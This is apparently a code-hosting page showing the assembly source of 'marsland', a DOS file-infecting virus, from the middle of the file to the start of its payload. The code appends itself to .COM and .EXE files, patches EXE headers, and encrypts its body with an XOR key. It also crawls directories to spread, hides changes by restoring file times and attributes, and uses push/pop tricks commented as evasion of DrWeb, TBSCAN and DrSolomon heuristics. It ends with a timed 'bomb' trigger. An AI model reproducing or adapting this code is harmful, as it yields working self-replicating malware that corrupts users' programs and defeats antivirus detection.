📄 marsland.asm
字号:
;-----------------calculate new size---------------------------
;
pop dx
pop ax
push ax
add ax, fin_cryptage-virus
adc dx, 0
mov cl, 7
shl dx, cl
mov cl, 9
shr ax, cl
add ax, dx
inc ax
mov word ptr [bp+ exehead+04h], ax
pop ax
add ax, fin_cryptage-virus
and ah, 1
mov word ptr [bp+ exehead+02h], ax
;
;-----------------write signature----------------------------------
;
mov word ptr [bp+exehead+12h], "ee"
;
;--------------------infection---------------------
;
call infecte
;
;----------write new header of the infected file on disk---------------------
;
mov ax, 4200h
push ax ;this stupid push/pop
pop ax ;to avoid DrWeb heuristic
xor cx, cx
xor dx, dx
int 21h ;pointer at start of file on disk
mov cx, 1Ch
lea dx, [bp+exehead]
call ecrit_fichier ;write on disk modified header
;
;----------restore time/date of the file--------------------
;
call restaure_time
;
;----------close file and restore file attributes----------------------
;
call remise_en_etat
;
;--------verify how many .exe files we have infected------------------
;
mov byte ptr cl, [bp+offset compteur_exe] ;counter in cl
inc cl ;one more
cmp cl, 3 ;we infect 3?
je bombe_ou_pas ;yes => let's stop infections
mov byte ptr [bp+offset compteur_exe], cl ;no => write counter
;
;--------let's infect a new .exe file------------------
;
jmp exe_suivant ;go infect next file
;
;--------------------does the bomb explode?---------------------
;
bombe_ou_pas:
mov ah, 2Ch ;internal clock: ch=hour et cl=minute
int 21h
cmp cl, 30d ;minutes = 30?
jne redonne_main ;no => return to host
cmp dh, 30d ;yes => test seconds
ja redonne_main ;if secondes > 30 we return to host
jmp bombe ;if seconds <30 (1/120) the bomb explodes
;**********************************************************************
; RETURN TO HOST
;**********************************************************************
redonne_main:
;------------------DTA in the normal zone-----------------------------
; (to avoid perturbing host program)
;
push 1a00h ;push/pop
pop ax ;to avoid flag F
mov dx, 80h ;to 80h, the normal zone
int 21h
;
;--------restore the directory in which we were when we started-----------
;
lea dx, [bp+offset repert]
mov ax, 3B00h ;3bh=change directory
int 21h
;
;-----------active host is a .com or a .exe?-------------------
;
cmp byte ptr cs:0, 0CDh ;a .com file have an Int20h
je redonne_main_com ;(word CD 20) at offset 0
;
;-------------return to an .exe---------------------------
;
redonne_main_exe:
pop ds ;remember the very first push ds
push ds
pop es ;get es=ds
mov ax, es
add ax, 10h
add word ptr cs:[bp+vCS], ax
cli
add ax, word ptr cs:[bp+vSS] ;adjust stack pointers
mov ss, ax
mov sp, word ptr cs:[bp+vSP]
sti
jmp retour_au_prog
cinq_octets:
pip db 90h,90h ;zone to keep file information
pcs db 90h,90h ;EXE: keep ip, cs, ss, sp
pss db 90h,90h ;COM: keep 5 first bytes
psp db 90h,90h
retour_au_prog:
db 0EAh ;far jump opcode, for .exe
contenu:
vIP dw 0 ;zone to keep temporarly file info
vCS dw 0 ;EXE: keep ip, cs, ss, sp
vSS dw 0 ;COM: keep 5 first bytes
vSP dw 0
;
;-----------------------return to a .com---------------------------
;
redonne_main_com:
pop ax ;clean stack (remember first push ds)
;
;---------replace 5 first bytes of the host in memory----------
;
lea si, [bp+offset contenu] ;memory zone where they are
mov ax, 101h ;this is to
dec ax ;avoid flag B in TBSCAN
mov di, ax ;a .com start at offset 100h
movsw
movsw
movsb ;move 5 bytes
;
;-----------------------return to host----------------------------
; (remember the very first CALL: we have 103h on the stack)
;
redonner_la_main:
pop ax ;get 103h
sub ax, 3 ;we want 100h
push ax ;re-put it on stack (for the RET)
xor ax, ax ;a starting program
xor bx, bx ;likes to find all
xor cx, cx ;registers equals
xor dx, dx ;to zero
ret ;return to normal program
;**********************************************************************
; CHANGE DIRECTORY
;**********************************************************************
;
;----------climb to upper directory--------------------------
;
rep_sup:
lea dx, [bp+offset dot] ;let's go to ".." repertory
mov ah, 3bh
int 21h ;are we in the root?
jc on_redescend ;yes => c=1, let's go down now
jmp recherche ;no => find first file
;
;---if we are in root, let's go to all "first-level" subdirectories-------
;
on_redescend:
mov ah, 4eh ;find first file
mov cx, 16 ;with directory attribute
lea dx, [bp+offset dir_masque] ;called "*.*"
int 21h ;one found?
jnc contin ;yes => continue
jmp bombe_ou_pas ;no => test time for the bomb
contin:
cmp byte ptr[bp+offset phase], 0 ;how is the dir counter (called phase)?
je le_premier ;phase=0 => do not find next dir
xor bh, bh
mov bl, byte ptr [bp+offset phase] ;bx=phase
rep_suivant: ;loop to avoid all subdir already infected
mov cx, 16 ;directory attributes
mov ah, 4fh ;find next dir
int 21h ;one found?
jnc contin2 ;yes => continue
jmp bombe_ou_pas ;no => test time for the bomb
contin2:
cmp byte ptr [bp+offset dta+15h], 16 ;is it really a directory?
jne rep_suivant ;no => find next
dec bx ;this routine is made to infect
cmp bx, 0 ;directory "number phase"
jne rep_suivant ;if bx<>0, the subdir is already infected
le_premier:
add byte ptr[bp+offset phase], 1 ;OK, we are on a subdir not infected
lea dx, [bp+offset dta+1eh] ;so, let's change
mov ah, 3bh ;directory to it
int 21h
jmp recherche ;and infect this new subdirectory
;**********************************************************************
; ROUTINE OFTEN USED (to save bytes)
;**********************************************************************
;-------------------verify extension-------------------------
verifie_extension:
mov cx, 13d ;max size of a file name (not really, but
lea si, [bp+offset dta+1eh] ;who cares? I've stolen this routine somewhere)
compare: ;loop for detecting start of the extension
lodsb ;letter in al
cmp al, "." ;is it a point?
jne compare ;no => test next letter
inc si ;yes => si points on second extension letter
ret
;------------------change crypting key---------------
change_clef:
mov ah, 2Ch ;internal clock
int 21h ;cx get quite randomic
mov [bp+offset clef], cl ;let's keep it somewhere
ret
;------------------------open file-------------------------
ouvre_et_verif_header:
mov ax, 3D02h ;3D02h=open file
lea dx, [bp+offset dta+1eh] ;name of the file in DTA
int 21h
jnc saut2 ;one file found, c=0, continue
jmp remise_en_etat ;not found => arrange file
saut2: ;continue
mov [bp+offset handle],ax ;keep handle in memory
;
;----------------read first 1Ch bytes of the file-----------------
;
xchg ax, bx ;handle in ax
mov cx, 1Ch ;number of bytes to read
mov ax, 3F00h ;3F=read file
lea dx, [bp+offset exehead] ;dx on stockage zone
int 21h
jnc saut3 ;no problem, c=0, continue
jmp remise_en_etat ;problem => arrange file
saut3: ; continue
;
;-----------is the file already infected?-------------
;
cmp byte ptr [bp+offset exehead+18h], 40h ;is it a windows file?
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+3], "ee" ;.com already infected?
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+12h], "ee" ;.exe already infected?
jnz saut4 ;no => continue
deja_infecte:
jmp remise_en_etat ;let's arrange the file
saut4: ;continue
;
;--------------------is the size correct?-------------------
;
cmp [bp+offset dta+1ah], 500 ;do not infect if file<500 bytes
ja verif_ok ;it's OK
;
;--------arrange file and close it in case of non-infection-----------
;
remise_en_etat:
mov ah, 3Eh ;3Eh=close file
int 21h
;
;-----------------restore file attributes-----------------------
;
call restaure_attrib ;restore attributes
;
;------after arranging the file, let's go back to the CALL-------
;
ret
;
;----------------------if it's good to infect,-------------------
; let's go back one instruction after the call
;
verif_ok:
pop ax ;get offset of the return on the stack
add ax, 2 ;add 2 (size of a short JMP)
push ax ;put it back on the stack
ret ;return 2 bytes after the call
;-----------------------------infection--------------------------
;first, let's write non-encrypted part
infecte:
mov cx, debut_cryptage - virus ;size of non-encrypted part
lea dx, [bp+offset virus] ;dx on beginning of this part
call ecrit_fichier ;write this on disk
;second, let's crypt next part in memory
mov dl, [bp+offset clef] ;dl=new key
lea si, [bp+offset debut_cryptage] ;si=start of crypted zone
lea di, [bp+offset zone_de_travail] ;di=temp memory zone for crypting
mov cx, fin_cryptage - debut_cryptage ;cx=number of bytes to crypt
crypte_et_transfere: ;the loop
lodsb ;get original byte
xor al, dl ;crypt it
stosb ;put it on memory
loop crypte_et_transfere ;again
;third, disk writing of the crypted zone
mov cx, fin_cryptage - debut_cryptage ;number of bytes to write
lea dx, [bp+offset zone_de_travail] ;dx=offset of the temp zone
call ecrit_fichier ;write it on disk
ret
;-------------------modify attributes-------------------------
attrib_a_zero:
xor cx, cx ;if we want to put attrib to zero
jmp suite_attrib
restaure_attrib:
xor ch, ch ;if we want to restore attrib
mov cl, byte ptr [bp+offset dta+15h] ;from the DTA value
suite_attrib:
lea dx, [bp+offset dta+1eh] ;file name
push 4301h ;43h=change attribs
pop ax ;avoid flag F from TBSCAN
int 21h
ret
;---------------------restore file time/date-----------------------
restaure_time:
mov dx, word ptr [bp+offset dta+18h] ;date from DTA to dx
mov cx, word ptr [bp+offset dta+16h] ;time from DTA to cx
push 5701h ;5701h=change time/date
pop ax ;avoid flag F from TBSCAN
int 21h
ret
;------------------write file on disk----------------------
ecrit_fichier:
push 4000h ;the famous 40Hex... push/pop to
pop ax ;avoid DrSolomon and DrWeb heuristic
int 21h
ret
;--------------------move pointer on disk---------------------------
pointeur_debut: ;to put pointer at the beginning
xor dx, dx
pointeur_debut_sans_dx: ;i think i don't use this... never mind
xor cx, cx
mov ax, 4200h ;42h=move disk pointer
push ax ;stupid push/pop to avoid
pop ax ;DrWeb heuristic
int 21h
ret
;**********************************************************************
; CODE OF THE GRAPHIC BOMB: A 3D VOXEL EFFECT
;**********************************************************************
bombe:
largeur equ 128 ;size of the grid
;-------------------------VGA-------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -